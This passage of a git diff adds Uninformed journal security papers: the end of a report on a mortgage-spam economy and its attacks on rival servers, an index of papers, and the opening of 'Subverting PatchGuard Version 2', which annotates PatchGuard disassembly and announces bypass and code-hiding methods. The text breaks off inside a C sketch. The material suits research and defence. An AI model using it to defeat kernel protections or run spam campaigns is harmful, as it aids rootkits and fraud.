+tend to pay for reliable hosting.
+
+Often, the businesses providing the bullet-proof-hosting servers are
+relatively well known, and if they are known, so is their allotted IP
+space. This, in turn, makes finding servers hosting mortgage
+applications a piece of cake. All one has to do is scan a known IP
+segment for specific criteria and keep track of those that fit the
+profile. Once a worthy target list has been collected, the attacks
+follow. An interesting fact about the individuals involved in this
+industry is that nothing either party is doing is really all that legal.
+This, in fact, allows an attacker to launch whatever type of attack he
+wants on the victim machine with little to no worry about legal
+repercussions. Often a collection machine will have several required
+services open to the Internet, for example http, ssh, ftp, mysql or
+mssql, and sometimes an administrative web interface. The scope of an
+attack is unlimited, and the number of man hours invested directly
+reflects the amount of traffic the victim website attracts. It is even
+pretty common for certain prowlers to lease a server from the same
+segment the victim machine is on simply to increase their odds of
+breaching the host. 
The following shortly describes common attack +practices launched against victim websites. + +- Brute-force Enumeration + + An attacker will attempt to guess login and password pairs on any if + not all of these services. Usually this kind of attack is not too + stealthy, but remember there is little worry - I mean the victim + cannot simply pick up the phone and call his lawyer can he? + +- SQL Injection + + If any of the web interfaces are accessible through the site, sql + injection attacks are another vector for entry. Although the success + ratio of sql injection is now relatively low, there are still some + low hanging fruit to find and be assured someone greedy and + ambitious enough will find it. + +- Classic Attacks + + With the massively large number of exploits developed and released to + the public daily, searching and launching attacks is a frequent action. + This sometimes opens up a new market for exploit writers looking to + make some quick cash. Collectors can advertise the need for an exploit + and place a price on a particular application. There are even online + auctions that have been built specifically for this purpose. + +- Passive / Passive Aggressive + + When an attacker decides to lease a machine on the same segment, it + is usually because they failed to remotely compromise the victim's + machine. As a last resort they can do several things to retrieve + the information they are looking for. The attacker can launch an + ARP Poisoning attack and sniff all the incoming traffic to the + victim machines, an attacker can simply redirect all the client + requests to himself and collect the leads himself, or even hope for + the victim himself to logon and perform a man-in-the middle attack to + passively collect credentials. + + +6) More on The Money + +In this section, I will associate the roles described above with the +amount of money they can generate. As described earlier, the mailer +serves as the core distributor of an advertising campaign. As a company +would pay a marketing company for it to advertise its products, a +collector pays a mailer to generate leads (e.g advertise and generate +revenue). He can also simply take matters into his or her own hands and +do the dirty work himself. If a mailer is hired however, to properly +track what a mailer collects there is a nifty procedure in place. Each +mailer is given a unique ID number and the link spammed in each email +contains the ID number. When a client submits information regarding his +loan inquiry, the mailer's ID number is included and the collector now +has record of how many leads a mailer is generating. This method of +tracking referrals is well adopted in most spam/advertising related +industries online. The majority of spyware and adware vendors leverage +this method of tracking to pay their affiliates. + +A single spam run can be as large as two million emails. The time +needed to complete a run that big depends on a few key factors - the +method used for distribution and the spam software being used. If a +decent sized list of proxies is used you can send an average of about +forty thousand emails per half hour using Dark Mailer . With a little +math we can compute that transmitting two million emails would take +about twenty-five hours. More over, if I were to shoot low and say that +.01 percent of two million emails from a single spam run actually +worked, the return for the collector on exclusive leads is about 200 +leads per mailer at 10 dollars a lead results to about 2,000 USD. 
The +mailers recieve on average about 8 per referal and can usually track +their statistics through a web-based front end tracking their return on +time investment in real-time. + + +7) The Disaster + +So far, I've covered in fairly good detail the structure of what was +once a falling corporation taking a 180 degree turn and rising straight +back up to the top. It is too well known though, that what goes up must +come down and twice as fast as it went up. + +The core of the problems started out when mailers began to falsify the +content of the spam for their collectors. Mailers noticed that the +lower the rate they advertised the more traffic they would drive to the +collector's website. More traffic indicated a higher collection of +leads which resulted in more money. Whether the mailers were aware of +the laws before they did what they did is unknown to me but their lies +resulted in law suites unfolding from all sides. Unhappy individuals +who had been promised a 1.9 - 2.5 interest rate on a loan began filing +law suites against the collectors. This resulted in a fairly large +chain of angry partners. The hierarchy below indicates the ripple of +disaster that came about. + + +8) Conclusion + +It is fair to say that ambition can get the best out of people Indeed, +I'm sure these individuals are trying their best to make a profit out of +this endeavor. Unfortunately, it is not the most appropriate way to +make a living; it does however show that their perception is a bit +different. Most of them feel that by staying away from selling drugs +and pornography online, they are not hurting anyone and simply taking +advantage of a good way to make some money. In retrospect, I agree, but +I refuse to condone spam for any reason, it consumes countless corporate +man hours and is a general nuisance to anyone who receives email. + + +A. References + + Spammer-X, ``Inside the spam cartel." http://www.oreilly.com/catalog/1932266860/. + Boiler Room, http://www.imdb.com/title/tt0181984/. + + + + diff --git a/uninformed/5.5.pdf b/uninformed/5.5.pdf new file mode 100644 index 0000000..d2d5e66 Binary files /dev/null and b/uninformed/5.5.pdf differ diff --git a/uninformed/5.txt b/uninformed/5.txt new file mode 100644 index 0000000..ec80d9b --- /dev/null +++ b/uninformed/5.txt @@ -0,0 +1,29 @@ +Exploitation Technology +Implementing a Custom X86 Encoder +skape +This paper describes the process of implementing a custom encoder for the x86 architecture. To help set the stage, the McAfee Subscription Manager ActiveX control vulnerability, which was discovered by eEye, will be used as an example of a vulnerability that requires the implementation of a custom encoder. In particular, this vulnerability does not permit the use of uppercase characters. To help make things more interesting, the encoder described in this paper will also avoid all characters above 0x7f. This will make the encoder both UTF-8 safe and tolower safe. +txt | html | pdf + +Preventing the Exploitation of SEH Overwrites +skape +This paper proposes a technique that can be used to prevent the exploitation of SEH overwrites on 32-bit Windows applications without requiring any recompilation. While Microsoft has attempted to address this attack vector through changes to the exception dispatcher and through enhanced compiler support, such as with /SAFESEH and /GS, the majority of benefits they offer are limited to image files that have been compiled to make use of the compiler enhancements. 
This limitation means that without all image files being compiled with these enhancements, it may still be possible to leverage an SEH overwrite to gain code execution. In particular, many third-party applications are still vulnerable to SEH overwrites even on the latest versions of Windows because they have not been recompiled to incorporate these enhancements. To that point, the technique described in this paper does not rely on any compile time support and instead can be applied at runtime to existing applications without any noticeable performance degradation. This technique is also backward compatible with all versions of Windows NT+, thus making it a viable and proactive solution for legacy installations. +txt | html | pdf + +Fuzzing +Effective Bug Discovery +vf +Sophisticated methods are currently being developed and implemented for mitigating the risk of exploitable bugs. The process of researching and discovering vulnerabilities in modern code will require changes to accommodate the shift in vulnerability mitigations. Code coverage analysis implemented in conjunction with fuzz testing reveals faults within a binary file that would have otherwise remained undiscovered by either method alone. This paper suggests a research method for more effective runtime binary analysis using the aforementioned strategy. This study presents empirical evidence that despite the fact that bug detection will become increasingly difficult in the future, analysis techniques have an opportunity to evolve intelligently. +code.tgz | txt | html | pdf + +General Research +Wars Within +Orlando Padilla +In this paper I will uncover the information exchange of what may be classified as one of the highest money making schemes coordinated by 'organized crime'. I will elaborate on information gathered from a third party individual directly involved in all aspects of the scheme at play. I will provide a detailed explanation of this market's origin, followed by a brief description of some of the actions strategically performed by these individuals in order to ensure their success. Finally, I will elaborate on real world examples of how a single person can be labeled a spammer, malware author, cracker, and an entrepreneur gone thief. For the purposes of avoiding any legal matters, and unwanted media, I will refrain from mentioning the names of any individuals and corporations who are involved in the schemes described in this paper. +txt | html | pdf + +Wireless Technology +Fingerprinting 802.11 Implementations via Statistical Analysis of the Duration Field +Johnny Cache +The research presented in this paper provides the reader with a set of algorithms and techniques that enable the user to remotely determine what chipset and device driver an 802.11 device is using. The technique outlined is entirely passive, and given the amount of features that are being considered for inclusion into the 802.11 standard, seems quite likely that it will increase in precision as the standard marches forward. The implications of this are far ranging. On one hand, the techniques can be used to implement innovative new features in Wireless Intrusion Detection Systems (WIDS). On the other, they can be used to target link layer device driver attacks with much higher precision. 
+code.ref | html | pdf + diff --git a/uninformed/6.1.txt b/uninformed/6.1.txt new file mode 100644 index 0000000..69fc5b0 --- /dev/null +++ b/uninformed/6.1.txt @@ -0,0 +1,2606 @@ +Subverting PatchGuard Version 2 +Skywing +12/2006 +skywing@valhallalegends.com +http://www.nynaeve.net + +1) Foreword + +Abstract: Windows Vista x64 and recently hotfixed versions of the Windows +Server 2003 x64 kernel contain an updated version of Microsoft's kernel-mode +patch prevention technology known as PatchGuard. This new version of +PatchGuard improves on the previous version in several ways, primarily dealing +with attempts to increase the difficulty of bypassing PatchGuard from the +perspective of an independent software vendor (ISV) deploying a driver that +patches the kernel. The feature-set of PatchGuard version 2 is otherwise +quite similar to PatchGuard version 1; the SSDT, IDT/GDT, various MSRs, and +several kernel global function pointer variables (as well as kernel code) are +guarded against unauthorized modification. This paper proposes several +methods that can be used to bypass PatchGuard version 2 completely. Potential +solutions to these bypass techniques are also suggested. Additionally, this +paper describes a mechanism by which PatchGuard version 2 can be subverted to +run custom code in place of PatchGuard's system integrity checking code, all +while leaving no traces of any kernel patching or custom kernel drivers loaded +in the system after PatchGuard has been subverted. This is particularly +interesting from the perspective of using PatchGuard's defenses to hide kernel +mode code, a goal that is (in many respects) completely contrary to what +PatchGuard is designed to do. + +Thanks: The author would like to thank skape, bugcheck, and Alex Ionescu. + +Disclaimer: This paper is presented in the interest of education and the +furthering of general public knowledge. The author cannot be held responsible +for any potential use (or misuse) of the information disclosed in this paper. +While the author has attempted to be as vigilant as possible with respect to +ensuring that this paper is accurate, it is possible that one or more mistakes +might remain. If such an inaccuracy or mistake is located, the author would +appreciate being notified so that the appropriate corrections can be made. + +2) Introduction + +With x64 versions of the Windows kernel, Microsoft has attempted to take an +aggressive stance[1] against the use of a certain class of techniques that have +been frequently used to ``extend'' the kernel in potentially unsafe fashions +on previous versions of Windows. This includes patching the kernel itself, +hooking the kernel's system service tables, redirecting interrupt handlers, +and several other less common techniques for intercepting control of execution +before the kernel is reached, such as the alternation of the system call +target MSR. + +The technology that Microsoft has deployed to prevent the unauthorized +patching of the kernel that has been historically rampant on x86 is known as +PatchGuard. This technology was initially released with Windows Server 2003 +x64 Edition and Windows XP x64 Edition (known as PatchGuard version 1). The +x64 editions of Windows Vista, and recently hotfixed versions of the Windows +Server 2003 x64 kernel contain a newer version of the PatchGuard technology, +known as PatchGuard version 2. 
The new version is designed to make it +significantly more difficult for independent software vendors (ISVs) to +deploy, in the field, solutions that involve patching the kernel after +disabling the kernel patch protection mechanisms afforded by PatchGuard. The +inner details of PatchGuard itself are much the same as they were in +PatchGuard version 1 and thus will not be discussed in detail in this paper +(excluding version 2's improved anti-debugging and anti-patch technologies). +A sufficiently interested reader wishing some more background information on +the subject may find out more about how PatchGuard version 1 functions in +Uninformed's previous article [2] on the subject, ``Bypassing PatchGuard on +Windows x64''. + +PatchGuard version 2 takes the original PatchGuard release and attempts to +plug various holes in its implementation of an obfuscation-based anti-patching +system. In this respect, it has met some mixed success and failure. Although +the new PatchGuard version does, on the surface, appear to disable the +majority of the bypass techniques that had been proposed [2] as means to disable +the original PatchGuard release, at least several of these techniques may be +fairly trivially re-enabled through some minor alterations or additional new +code. Furthermore, it is still possible to bypass PatchGuard version 2 +without relying on dangerous (version-specific) constructs such as hard-coded +offsets or code fingerprinting on frequently changing code. Additionally, +aside from techniques that are based on disabling PatchGuard itself, there +still exist several potential bypass mechanisms that have a strong potential +to be ``future-compatible'' with new PatchGuard versions by virtue of +preventing PatchGuard from even detecting that unauthorized alternations to +the kernel have been made (and thus isolating themselves from any +obfuscation-based changes to how PatchGuard's system integrity check is +invoked). To Microsoft's credit, however, the resilience of PatchGuard to +being debugged and analyzed has been significantly improved (at least with +regard to certain key steps, such as initialization at boot time). + +3) Notable Protection Mechanisms + +PatchGuard version 2 implements a variety of anti-debug, anti-analysis, and +obfuscation mechanisms that are worth covering. Not all of PatchGuard's +defenses are covered in detail in this paper, and those mechanisms (such as +the obfuscation of PatchGuard's internal data structures) that are at least +the same in principle as the previous PatchGuard release (and were already +disclosed by Uninformed's previous article [2] on PatchGuard) are additionally +not covered by this paper. + +3.1) Anti-Debug Code During Initialization + +That being said, there are still a number of interesting things to examine as +far as PatchGuard's protection mechanisms go. Many of these techniques are on +their own worthy of discussion, simply from the perspective of their worth as +general debug/analysis protection mechanisms. PatchGuard version 2 begins as +an appended addition to the nt!SepAdtInitializePrivilegeAuditing routine in +the kernel (PatchGuard version 2 continues the tactic of misleading and/or +bogus function names that PatchGuard version 1 introduced). This routine is +responsible for performing the bulk of PatchGuard's initialization, including +setting up the encrypted PatchGuard context data structures. 
Unlike +PatchGuard version 1, the initialization routine is littered with statements +that are intended to frustrate debugging, such as the following construct that +enters an infinite loop if a debugger is connected (this particular construct +is used in many places during PatchGuard initialization): + +cli +cmp cs:KdDebuggerNotPresent, r12b +jnz short continue_initialization_1 +infinite_loop_1: +jmp short infinite_loop_1 +sti + +This particular approach is not all that robust as currently implemented in +PatchGuard version 2 today. It remains relatively easy to detect these +references to nt!KdDebuggerNotPresent ahead of time, and disable them. If +Microsoft had elected to corrupt the execution context in a creative way on +each occurrence (such as zeroing some registers, or otherwise arranging for a +failure to occur much later on if a debugger was attached) before entering the +forever loop, then these constructs might have been slightly effective as far +as anti-debugging goes. + +Other constructs include the highly obfuscated selection of a randomized set +of bogus pool tags used to allocate PatchGuard data structures. Like +PatchGuard version 1, PatchGuard version 2 uses a randomly chosen bogus pool +tag and randomly adjusted allocation sizes in an attempt to frustrate easy +detection of the PatchGuard context in-memory by scanning pool allocations. +The following is an example of one of the sections of code used by PatchGuard +to randomly pick a pool tag and random allocation delta from a list of +possible pool tags. The actual allocation size is the random allocation delta +plus the minimum size of the PatchGuard context structure, truncated at 2048 +bytes. Here, the rdtsc instruction is used for random number generation +purposes (readers that have examined the previous [2] PatchGuard paper may +recognize this random number generation construct; it is used throughout +PatchGuard anywhere a random quantity is required). + +; +; Generate a random value, using rdtsc. +; +lea ebx, [r14+r13+200h] +mov dword ptr [rsp+0A28h+Timer], ebx +rdtsc +mov r10, qword ptr [rsp+0A28h+arg_5F8] +shl rdx, 20h +mov r11, 7010008004002001h +or rax, rdx +mov rcx, r10 +xor rcx, rax +lea rax, [rsp+0A28h+var_2C8] +xor rcx, rax +mov rax, rcx +ror rax, 3 +xor rcx, rax +mov rax, r11 +mul rcx +mov [rsp+0A28h+var_2C8], rax +xor eax, edx +mov [rsp+0A28h+arg_1F0], rdx +; +; This is essentially a switch(eax & 7), where eax +; is a random value. Each case statement selects +; a unique obfuscated pooltag value. The magical +; 0x432E10h constant below is the offset used to +; jump to the switch case handler selected. 
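+; The lea below loads the image base into rdx; the indexed read at
+; [rdx+rax*4+432E10h] then fetches a 32-bit case RVA from a jump table
+; indexed by (eax & 7), and adding rdx rebases that RVA into a full
+; 64-bit pointer before the indirect jmp transfers control to the
+; selected case. The DPC selection switch shown later in this paper
+; uses the same image-base-plus-RVA construct.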
+; +lea rdx, cs:400000h +and eax, 7 +mov ecx, [rdx+rax*4+432E10h] +add rcx, rdx +jmp rcx +-------------------------------------------------- +mov dword ptr [rsp+0A28h+var_9D8], 0D098D0D8h +mov r9d, dword ptr [rsp+0A28h+var_9D8] +ror r9d, 6 +jmp DoAllocation +-------------------------------------------------- +mov dword ptr [rsp+0A28h+var_9D8], 0B2AD31A1h +mov r9d, dword ptr [rsp+0A28h+var_9D8] +rol r9d, 1 +jmp DoAllocation +-------------------------------------------------- +mov dword ptr [rsp+0A28h+var_9D8], 85B5910Dh +mov r9d, dword ptr [rsp+0A28h+var_9D8] +ror r9d, 2 +jmp DoAllocation +-------------------------------------------------- +mov dword ptr [rsp+0A28h+var_9D8], 0A8223938h +mov r9d, dword ptr [rsp+0A28h+var_9D8] +xor r9d, 3 +ror r9d, 0Fh +jmp DoAllocation +-------------------------------------------------- +mov dword ptr [rsp+0A28h+var_9D8], 67076494h +mov r9d, dword ptr [rsp+0A28h+var_9D8] +rol r9d, 4 +jmp DoAllocation +-------------------------------------------------- +mov dword ptr [rsp+0A28h+var_9D8], 288C49EDh +mov r9d, dword ptr [rsp+0A28h+var_9D8] +ror r9d, 5 +jmp DoAllocation +-------------------------------------------------- +mov dword ptr [rsp+0A28h+var_9D8], 4E574672h +mov r9d, dword ptr [rsp+0A28h+var_9D8] +xor r9d, 6 +ror r9d, 18h +jmp DoAllocation +-------------------------------------------------- +DoAllocation: +; +; Get another random value (for the allocation size), +; and deobfuscate the pooltag value that was selected. +; +; Eventually, the value ending up in "r9d" is used as +; the pooltag value. +; +rdtsc +shl rdx, 20h +mov rcx, r10 +or rax, rdx +xor rcx, rax +lea rax, [rsp+0A28h+var_858] +xor rcx, rax +mov rax, rcx +ror rax, 3 +xor rcx, rax +mov rax, r11 +mul rcx +mov [rsp+0A28h+ValueName], rdx +mov r9, rax +mov [rsp+0A28h+var_858], rax +xor r9d, edx +mov eax, 4EC4EC4Fh +mov ecx, r9d +mul r9d +shr edx, 3 +shr r9d, 5 +mov r8d, r9d +mov eax, 4EC4EC4Fh +imul edx, 1Ah +sub ecx, edx +add ecx, 61h +shl ecx, 8 +mul r9d +shr edx, 3 +shr r9d, 5 +mov eax, 4EC4EC4Fh +imul edx, 1Ah +sub r8d, edx +mul r9d +add r8d, 41h +mov eax, 4EC4EC4Fh +or r8d, ecx +shr edx, 3 +mov ecx, r9d +shr r9d, 5 +shl r8d, 8 +imul edx, 1Ah +sub ecx, edx +add ecx, 61h +or ecx, r8d +shl ecx, 8 +mul r9d +shr edx, 3 +imul edx, 1Ah +sub r9d, edx +add r9d, 41h +or r9d, ecx +rdtsc +shl rdx, 20h +mov rcx, r10 +mov r8d, r9d ; Tag +or rax, rdx +xor rcx, rax +lea rax, [rsp+0A28h+var_2E8] +xor rcx, rax +mov rax, rcx +ror rax, 3 +xor rcx, rax +mov rax, r11 +mul rcx +; +; Perform the actual allocation. We're requesting NonPagedPool, +; with the random pooltag selected by the deobfuscation and +; randomization code above. The actual size of the block being +; allocated here is given in ebx, with a random "fuzz factor" that +; is added to this minimum allocation size, then truncated to a +; maximum of 2047 bytes. +; +xor ecx, ecx ; PoolType +mov [rsp+0A28h+var_310], rdx +xor rdx, rax +mov [rsp+0A28h+var_2E8], rax +and edx, 7FFh +add edx, ebx ; NumberOfBytes +call ExAllocatePoolWithTag + +3.2) Expanded Set of DPC Routines + +Other protection mechanisms used in PatchGuard version 2 include an expanded +set of DPC routines used to arrange for the execution of the PatchGuard +integrity check routine. Recall that in PatchGuard version 1, there existed a +set of three possible DPC routines. In PatchGuard version 2, this set of +potential DPC routines that can be repurposed for PatchGuard's use has been +expanded to ten possibilities. 
One DPC routine is selected at boot time from +this set of ten possiblities, and from that point is used for all further +PatchGuard operations for the lifetime of the session. The fact that only one +DPC routine is used in a particular Windows session is a weakness that is +inherited from the previous PatchGuard version (as the reader will discover, +eventually comes in handy if one is set on bypassing PatchGuard). The DPC +routine to be used for the current boot session is selected in the +nt!SepAdtInitializePrivilegeAuditing routine, much the same as how the bogus +pooltag to be used for all PatchGuard allocations is selected: + +INIT:0000000000832741: +PatchGuard_Pick_Random_DPC: +; +; Use the time stamp counter as a random seed. +; +rdtsc +shl rdx, 20h +mov rcx, r15 +or rax, rdx +xor rcx, rax +lea rax, [rsp+0A28h+var_360] +xor rcx, rax +mov rax, rcx +ror rax, 3 +xor rcx, rax +mov rax, 7010008004002001h +mul rcx +mov [rsp+0A28h+var_360], rax +mov rcx, rdx +mov qword ptr [rsp+0A28h+arg_260], rdx +xor rcx, rax +mov rax, 0CCCCCCCCCCCCCCCDh +mul rcx +shr rdx, 3 +; +; The resulting value in `rax' is the index into a switch jump table +; that is used to locate the DPC to be repurposed for initiating +; PatchGuard checks for this session. +; +lea rax, [rdx+rdx*4] +add rax, rax +sub rcx, rax +jmp PatchGuard_DPC_Switch + +INIT:0000000000832317: +PatchGuard_DPC_Switch: +; +; The address of the case statement is formed by adding the image base (here, +; being loaded into `rdx') and an RVA in the table indexed by rax. +; +lea rdx, cs:400000h +mov eax, ecx +; +; Locate the case statement RVA by indexing the jump offset table. +; +mov ecx, [rdx+rax*4+432E60h] +; +; Add it to the image base to form a complete 64-bit address. +; +add rcx, rdx +; +; Execute the case handler. +; +jmp rcx + + +; +; The set of case statements are as follows: +; +; Each case statement block simply loads the full 64-bit address +; of the DPC routine to be repurposed for PatchGuard checks into +; the r8 register. This register is later stored into one of +; PatchGuard's internal data structures for future use. +; + +lea r8, CmpEnableLazyFlushDpcRoutine +jmp short PatchGuardSelectDpcRoutine +lea r8, _CmpLazyFlushDpcRoutine +jmp short PatchGuardSelectDpcRoutine +lea r8, ExpTimeRefreshDpcRoutine +jmp short PatchGuardSelectDpcRoutine +lea r8, ExpTimeZoneDpcRoutine +jmp short PatchGuardSelectDpcRoutine +lea r8, ExpCenturyDpcRoutine +jmp short PatchGuardSelectDpcRoutine +lea r8, ExpTimerDpcRoutine +jmp short PatchGuardSelectDpcRoutine +lea r8, IopTimerDispatch +jmp short PatchGuardSelectDpcRoutine +lea r8, IopIrpStackProfilerTimer +jmp short PatchGuardSelectDpcRoutine +lea r8, KiScanReadyQueues +jmp short PatchGuardSelectDpcRoutine +lea r8, PopThermalZoneDpc +; +; (fallthrough from last case statement) +; +INIT:0000000000832800: +PatchGuardSelectDpcRoutine: +xor ecx, ecx +; +; Store the DPC routine into r14+178. r14 points to one of +; the PatchGuard context structures in this particular instance. +; +mov [r14+178h], r8 + +Much like PatchGuard version 1, each of the DPCs selected for use in launching +the PatchGuard integrity checks has a legitimate function. Furthermore, the +DPC routines are ones that are important for normal system operation, thus it +is not possible for one to simply detect all DPCs that refer to these DPC +routines and cancel them. 
Instead, much as with PatchGuard version 1, if one +wanted to go the route of blocking PatchGuard's DPC, a mechanism to detect the +particular PatchGuard DPC (as opposed to the legitimate system invocations +thereof) must be developed. This aspect of PatchGuard's obfuscation +mechanisms is relatively similar to version 1, other than the logical +extension to ten DPCs instead of three DPCs. + +3.3) Self-Decrypting and Mutating System Integrity Check Routine + +PatchGuard version 2 also inherits the capability to encrypt its +datastructures and executable code in-memory from version 1. This is a +defensive mechanism that intends to make it difficult for an attacker to +perform a classic egghunt style search, wherein the attacker has devised an +identifiable signature for PatchGuard data structures that can be used to +locate it in an exhaustive non-paged-pool memory scan. From this perspective, +the obfuscation and encryption of PatchGuard code and data structures that are +dynamically allocated is still a reasonably strong defensive mechanism. +Unfortunately for Microsoft, though, some of the data structures linking to +PatchGuard are internal system structures (such as a KDPC and associated +KTIMER used to kick off PatchGuard execution). This presents a weakness that +could be potentially used to identify PatchGuard structures in memory (which +will be explored in more detail later). + +The encryption of PatchGuard's internal context structures was covered by +Uninformed's original paper [2] on the subject. However, the mechanism by which +PatchGuard obfuscates its system integrity checking and validation routines +was not discussed. This mechanism is novel enough to warrant some +explanation. The technique used to obfuscate PatchGuard's executable code +in-memory involves two layers of decryption/deobfuscation functions, each of +which decrypts the next layer. After both layers have run their course, +PatchGuard's validation routines are plaintext in memory and are then directly +executed. + +The first decryption layer is the code block that is called from the +repurposed DPC routine selected by PatchGuard at boot time. Its job is to +decrypt itself (in 8 byte chunks, starting with the second instruction in the +function). After the decryption of the this code block is complete, the +decryption stub continues on to decrypt a second code block (the actual +PatchGuard validation routine). When this second decryption/deobfuscation +cycle is completed, the decryption stub then executes the actual PatchGuard +system integrity check routine. + +As noted above, the first task for the decryption stub is to decrypt itself. +Except for the first instruction of the stub, the entire routine is encrypted +when entered. The first instruction encrypts itself and decrypts the next +instruction. The following instruction decrypts the next two instructions, +and soforth. This is accomplished by a series of four byte long instructions +that xor an eight byte quantity with a decryption key (initially starting at +the current instruction pointer - here, rcx and rip always have the same +value. 
An example of how this process works is illustrated below: + +; +; rcx: Address of the decryption stub (same as rip) +; rdx: Decryption key +; +Breakpoint 5 hit +nt!ExpTimeRefreshDpcRoutine+0x20a: +fffff800`0112c98b ff5538 call qword ptr [rbp+38h] +0: kd> u poi(rbp+38) +; +; Note that beyond the first instruction, the decryption stub is initially seemingly +; garbage data (though it has an apparent pattern to it, since it is merely obfuscated +; by xor). +; +fffffadf`f6e6d55d f0483111 lock xor qword ptr [rcx],rdx +fffffadf`f6e6d561 88644d68 mov byte ptr [rbp+rcx*2+68h],ah +fffffadf`f6e6d565 62 ??? +fffffadf`f6e6d566 d257df rcl byte ptr [rdi-21h],cl +fffffadf`f6e6d569 88644d78 mov byte ptr [rbp+rcx*2+78h],ah +fffffadf`f6e6d56d 62 ??? +fffffadf`f6e6d56e d257ef rcl byte ptr [rdi-11h],cl +fffffadf`f6e6d571 88644d48 mov byte ptr [rbp+rcx*2+48h],ah +0: kd> t +fffffadf`f6e6d55d f0483111 lock xor qword ptr [rcx],rdx +0: kd> r +; +; Note the initial input arguments. rcx points to the decryption stub's first +; instruction (same as rip), and rdx is the decryption key. +; +rax=fffffadff6e6d55d rbx=fffff8000116d894 rcx=fffffadff6e6d55d +rdx=601c55c0cf06e32a rsi=fffff800003c7ad0 rdi=0000000000000003 +rip=fffffadff6e6d55d rsp=fffff800003c51f8 rbp=fffff800003c7ad0 + r8=0000000000000000 r9=0000000000000000 r10=0000000001c7111e +r11=fffff800003c54c0 r12=fffff8000116d858 r13=fffff800003c5370 +r14=fffff80001000000 r15=fffff800003c60a0 +iopl=0 nv up ei pl zr na po nc +cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000246 +fffffadf`f6e6d55d f0483111 lock xor qword ptr [rcx],rdx ds:002b:fffffadf`f6e6d55d=684d6488113148f0 + +; +; After allowing the decryption of the stub to progress, we see the stub in its executable +; form. The first instruction is initially re-encrypted after executed, but a later +; instruction in the decryption stub returns the initial instruction to its executable, +; plaintext form. +; + +0: kd> u FFFFFADFF6E6D55D +; +; The `lock' prefix is used to create a four byte instruction when there +; is no immediate offset specified (a MASM limitation, as the assembler +; will convert a zero offset into the shorter form with no immediate +; offset operand). +; +fffffadf`f6e6d55d f0483111 lock xor qword ptr [rcx],rdx +fffffadf`f6e6d561 48315108 xor qword ptr [rcx+8],rdx +fffffadf`f6e6d565 48315110 xor qword ptr [rcx+10h],rdx +fffffadf`f6e6d569 48315118 xor qword ptr [rcx+18h],rdx +fffffadf`f6e6d56d 48315120 xor qword ptr [rcx+20h],rdx +fffffadf`f6e6d571 48315128 xor qword ptr [rcx+28h],rdx +fffffadf`f6e6d575 48315130 xor qword ptr [rcx+30h],rdx +fffffadf`f6e6d579 48315138 xor qword ptr [rcx+38h],rdx +0: kd> u +fffffadf`f6e6d57d 48315140 xor qword ptr [rcx+40h],rdx +fffffadf`f6e6d581 48315148 xor qword ptr [rcx+48h],rdx +; +; Because the initial instruction was re-encrypted after it was executed, +; we need to decrypt it again. +; +fffffadf`f6e6d585 3111 xor dword ptr [rcx],edx +fffffadf`f6e6d587 488bc2 mov rax,rdx +fffffadf`f6e6d58a 488bd1 mov rdx,rcx +fffffadf`f6e6d58d 8b4a4c mov ecx,dword ptr [rdx+4Ch] +; +; The following is the second stage decryption loop. It's purpose is to +; decrypt a code block following the current decryption stub in memory. +; +; This code block is then executed (it is responsible for performing the +; actual PatchGuard system verification checks). 
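+;
+; In the loop below, ecx (loaded from [rdx+4Ch] above) holds the number
+; of quadwords to process; each pass xors the quadword at
+; [rdx+rcx*8+48h] with the key held in rax and then rotates the key
+; right by cl bits, an amount that changes as rcx counts down, so that
+; every quadword is covered with a different key value and the block is
+; decrypted from its end toward its beginning.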
+; + +fffffadf`f6e6d590 483144ca48 xor qword ptr [rdx+rcx*8+48h],rax +fffffadf`f6e6d595 48d3c8 ror rax,cl +0: kd> u +fffffadf`f6e6d598 e2f6 loop fffffadf`f6e6d590 +; +; After decryption of the second block is completed, we'll execute it +; by jumping to it. Doing so kicks off the system verification routine +; that verifies system integrity, arranging for a bug check if not, +; otherwise arranging for itself to be executed again several minutes +; later. +; +fffffadf`f6e6d59a 8b8288010000 mov eax,dword ptr [rdx+188h] +fffffadf`f6e6d5a0 4803c2 add rax,rdx +fffffadf`f6e6d5a3 ffe0 jmp rax + +Prior to returning control, the verification routine re-encrypts itself so +that it does not remain in plaintext after the first invocation. In addition, +PatchGuard also re-randomizes the key used to encrypt and decrypt the +PatchGuard validation routine on each execution, such that a would-be attacker +has a frequently mutating target. Due to this behavior, the PatchGuard +validation routine changes appearance (in encrypted form) in-memory every few +minutes, which is the period of PatchGuard's validation checks. While this is +perhaps an admirable effort on Microsoft's part as far as interesting +obfuscation techniques go, it turns out that there are much easier avenues of +attack that can be used to disable PatchGuard without having to involve +oneself in the search of a target that alters its appearance in-memory every +few minutes. + +3.4) Obfuscation of System Integrity Check Calls via Structured Exception Handling + +Much like PatchGuard version 1, this version of PatchGuard utilizes structured +exception handling (SEH) support as an integral part of the process used to +kick off execution of the system integrity check routine. The means by which +this is accomplished have changed somewhat since the last PatchGuard version. +In particular, there are several layers of obfuscation in each PatchGuard DPC +that are used to shroud the actual call to the integrity check routine. In an +effort to make matters more difficult for would-be attackers, the exact +details of the obfuscation used vary between each of the ten DPCs that may be +repurposed for use with PatchGuard. They all exhibit a common pattern, +however, which can be described at a high level. + +The first step in invoking the PatchGuard system integrity checking routine is +a KTIMER with an associated KDPC (indicating a DPC callback routine to be +called when the timer lapses) associated with it. This timer is primed for +single-shot execution in an interval on the order of several minutes (with a +random fuzz factor delta applied to increase the difficulty of performing a +classic egghunt style attack to locate the KTIMER in non-paged pool). The DPC +routine indicated with the KDPC that is associated with PatchGuard's KTIMER is +one of the set of ten legitimate DPC routines that may be repurposed for use +with PatchGuard. The means by which this particular invocation of the DPC +routine is distinguished from a legitimate system invocation of the DPC +routine in question is by the use of a deliberately invalid kernel pointer as +one of the arguments to the DPC routine. 
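+
+For readers less familiar with kernel timer DPCs, the following is a
+minimal sketch of the generic KTIMER/KDPC construct that PatchGuard
+repurposes. This is not PatchGuard's actual code; the routine and
+variable names are invented, and the five minute due time is simply a
+placeholder for the randomized multi-minute interval described above.
+The DeferredContext parameter is the argument into which PatchGuard
+places its deliberately bogus, non-canonical pointer.
+
+#include <ntddk.h>
+
+static KDPC   g_Dpc;
+static KTIMER g_Timer;
+
+VOID
+SampleDeferredRoutine(
+    IN struct _KDPC *Dpc,
+    IN PVOID DeferredContext,
+    IN PVOID SystemArgument1,
+    IN PVOID SystemArgument2
+    )
+{
+    ULONG_PTR Cookie;
+
+    UNREFERENCED_PARAMETER(Dpc);
+    UNREFERENCED_PARAMETER(SystemArgument1);
+    UNREFERENCED_PARAMETER(SystemArgument2);
+
+    /*
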